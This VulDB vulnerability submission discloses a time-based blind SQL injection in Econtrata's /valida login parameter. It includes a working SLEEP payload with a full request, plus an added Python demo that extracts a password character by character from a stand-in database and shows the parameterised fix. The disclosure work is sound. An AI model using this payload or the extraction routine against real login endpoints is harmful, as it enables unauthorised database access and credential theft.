| Title | Econtrata NA SQL Injection |
|---|
| Description | Vulnerability Report: Time-Based Blind SQL Injection in usuario Parameter
Summary
A Time-Based Blind SQL Injection vulnerability exists in the usuario parameter of the login endpoint:
POST /valida
Host: example.com
The injected input is parsed and evaluated by the backend database. An attacker can confirm the injection point, and infer the result of arbitrary conditions, purely from response-time differences, even though the application returns no error text and no query data to the client.
Affected Endpoint
POST /valida HTTP/2
Host: example.com
Content-Type: application/x-www-form-urlencoded
Parameters:
usuario (vulnerable)
senha (not tested)
Proof of Concept (PoC)
Malicious Payload:
teste@teste.com' AND (SELECT 2277 FROM (SELECT(SLEEP(5)))KWDG)
URL-encoded Payload (what is actually sent on the wire):
usuario=teste%40teste.com%27%20AND%20(SELECT%202277%20FROM%20(SELECT(SLEEP(5)))KWDG)
Example Full Request (body shown decoded for readability; send it URL-encoded as above):
POST /valida HTTP/2
Host: example.com
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=32f7830c766c2891423d5f48a9e7bae6

usuario=teste@teste.com' AND (SELECT 2277 FROM (SELECT(SLEEP(5)))KWDG)&senha=
Expected Behavior:
A normal login attempt, with valid or invalid credentials, completes quickly. If the usuario value is concatenated into the SQL query, the injected SLEEP(5) adds roughly 5 seconds before the server responds.
⏱️ Observed Behavior:
The server responds after approximately 5 seconds.
This confirms that the injected SQL was executed and evaluated by the backend database. SLEEP() is MySQL/MariaDB syntax, so the delay also identifies the DBMS family. To rule out network jitter, repeat the measurement several times and vary the delay value (for example SLEEP(10)); the response time should track the requested value.
Impact
Authentication bypass (possible, since the injection point sits inside the login query)
Proof of arbitrary SQL execution
Enumeration of database contents character by character, using the time delay as a yes/no oracle
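The following is an added example, not code from the report or from Econtrata. It reproduces the time-based oracle offline against a stand-in login handler that concatenates usuario into its query, then shows the character-by-character extraction the Impact section refers to, and the parameterised query that closes the hole. Everything in it is an assumption for the demo: the table and column names (usuarios, usuario, senha), the query shape, the sample row, and the use of sqlite3 with a registered SLEEP() user function standing in for MySQL's SLEEP(). The injected value keeps the report's SLEEP subquery but gates it on a condition and appends AND 'a'='a to rebalance the quote opened by the original query.

```python
"""Added example (not from the report or from Econtrata): a stand-in for a
login handler that concatenates `usuario` into its SQL, used to reproduce
the time-based oracle offline and to show the parameterised fix.

Assumptions, labelled: table/column names (usuarios, usuario, senha), the
query shape, the sample row, and sqlite3 with a SLEEP() user function
standing in for MySQL's SLEEP() are all constructed for this demo."""
import sqlite3
import time

SLEEP_SECONDS = 0.1               # the report used SLEEP(5); short so the demo runs fast
ATTACKER_USER = "teste@teste.com"  # username from the report's payload


def make_db():
    """In-memory stand-in DB. SLEEP(n) is registered so MySQL-style payloads delay."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("SLEEP", 1, lambda n: time.sleep(float(n)) or 0)
    conn.execute("CREATE TABLE usuarios (id INTEGER PRIMARY KEY, usuario TEXT, senha TEXT)")
    conn.execute("INSERT INTO usuarios (usuario, senha) VALUES (?, ?)",
                 (ATTACKER_USER, "S3cr3t"))  # constructed sample row
    return conn


def login_vulnerable(conn, usuario, senha):
    """Assumed shape of the flawed /valida handler: string concatenation."""
    sql = f"SELECT senha FROM usuarios WHERE usuario='{usuario}'"
    row = conn.execute(sql).fetchone()
    return row is not None and row[0] == senha


def login_safe(conn, usuario, senha):
    """Hardened form: a bound parameter is data, never parsed as SQL."""
    row = conn.execute("SELECT senha FROM usuarios WHERE usuario=?", (usuario,)).fetchone()
    return row is not None and row[0] == senha


def timed_login(login, conn, usuario, senha):
    """Return (result, seconds). Errors are swallowed: to a blind attacker they
    look exactly like a failed login, which is why timing is the only signal."""
    t0 = time.perf_counter()
    try:
        result = login(conn, usuario, senha)
    except sqlite3.Error:
        result = None
    return result, time.perf_counter() - t0


def time_oracle(conn, login, condition):
    """Inject the report's SLEEP subquery, gated on `condition`; True if it slept.
    The trailing AND 'a'='a rebalances the quote opened by the original query.
    The report's username is kept so the row-level AND is actually reached."""
    usuario = (f"{ATTACKER_USER}' AND (SELECT 2277 FROM (SELECT(CASE WHEN ({condition}) "
               f"THEN SLEEP({SLEEP_SECONDS}) ELSE 0 END))KWDG) AND 'a'='a")
    _, elapsed = timed_login(login, conn, usuario, "")
    return elapsed >= SLEEP_SECONDS * 0.9  # margin for clock granularity; in the
    # field, compare against a measured baseline and repeat each probe


def extract_string(conn, login, expr, max_len=32):
    """Blind, character-by-character extraction of the scalar SQL `expr` via the
    time oracle: binary search over ASCII code points, 7 requests per character."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if time_oracle(conn, login, f"unicode(substr(({expr}),{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # substr past the end of the string: the oracle never fires
            break
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, 1=1 delays:", time_oracle(db, login_vulnerable, "1=1"))
    print("vulnerable, 1=2 delays:", time_oracle(db, login_vulnerable, "1=2"))
    print("leaked senha:", extract_string(db, login_vulnerable, "SELECT senha FROM usuarios LIMIT 1"))
    print("safe, 1=1 delays:", time_oracle(db, login_safe, "1=1"))
```

Against `login_vulnerable` the 1=1 probe sleeps and the 1=2 probe does not, and `extract_string` recovers the stored password in about 7 requests per character; against `login_safe` the same payload is compared as a literal username, so no delay is ever observed.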
|
|---|
| Source | ⚠️ https://github.com/yago3008/cves |
|---|
| User | y4g0 (UID 80480) |
|---|
| Submission | 16/05/2025 17:03 (11 months ago) |
|---|
| Moderation | 25/05/2025 15:31 (9 days later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 310260 [Econtrata up to 20250516 /valida usuario SQL Injection] |
|---|
| Points | 20 |
|---|